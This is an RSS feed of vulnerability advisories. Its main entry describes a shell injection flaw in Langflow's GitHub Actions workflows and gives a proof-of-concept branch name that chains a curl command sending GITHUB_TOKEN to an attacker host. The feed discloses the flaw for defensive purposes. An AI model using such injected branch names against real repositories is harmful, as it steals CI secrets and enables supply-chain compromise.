<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 03 Oct 2026 00:58:35 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-277307</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-277307</link>
      <description>EUVD-2026-277307</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-277307</guid>
    </item>
    <item>
      <title>fkie_cve-2026-33475</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-33475</link>
      <description>&lt;p&gt;Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.&lt;/p&gt;
&lt;p&gt;---&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:&lt;/p&gt;
&lt;p&gt;```yaml
run: |
  validate_branch_name &amp;#34;${{ github.event.pull_request.head.ref }}&amp;#34;
```&lt;/p&gt;
&lt;p&gt;Or:&lt;/p&gt;
&lt;p&gt;```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```&lt;/p&gt;
&lt;p&gt;Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.&lt;/p&gt;
&lt;p&gt;---&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. **Fork** the Langflow repository
2. **Create a new branch** with the name:
   ```bash
   injection-test &amp;amp;&amp;amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```
3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will ru…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.&lt;/p&gt;
&lt;p&gt;---&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:&lt;/p&gt;
&lt;p&gt;```yaml
run: |
  validate_branch_name &amp;#34;${{ github.event.pull_request.head.ref }}&amp;#34;
```&lt;/p&gt;
&lt;p&gt;Or:&lt;/p&gt;
&lt;p&gt;```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```&lt;/p&gt;
&lt;p&gt;Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.&lt;/p&gt;
&lt;p&gt;---&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;1. **Fork** the Langflow repository
2. **Create a new branch** with the name:
   ```bash
   injection-test &amp;amp;&amp;amp; curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```
3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will ru…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-33475</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-0823 — Langflow: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0823</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Langflow ausnutzen, um beliebigen Programmcode auszuführen, um Informationen offenzulegen, und potenziell um Daten zu manipulieren.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in Langflow ausnutzen, um beliebigen Programmcode auszuführen, um Informationen offenzulegen, und potenziell um Daten zu manipulieren.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-0823</guid>
    </item>
  </channel>
</rss>
